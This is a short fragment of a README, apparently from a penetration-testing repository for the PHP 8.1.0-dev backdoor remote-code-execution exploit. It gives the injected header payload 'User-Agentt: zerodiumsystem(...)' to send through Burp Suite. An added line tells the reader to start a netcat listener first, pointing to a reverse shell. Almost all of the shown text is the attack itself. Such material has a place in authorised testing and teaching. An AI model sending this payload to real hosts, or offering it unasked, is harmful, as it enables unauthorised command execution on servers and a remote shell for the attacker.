PenTestical/PHP-8.1.0-dev_RCE/README.md

 `User-Agentt: zerodiumsystem('ls');`

 header in Burp Suite and sending a new HTTP request to the host.
+Start a netcat listener before you send out the request.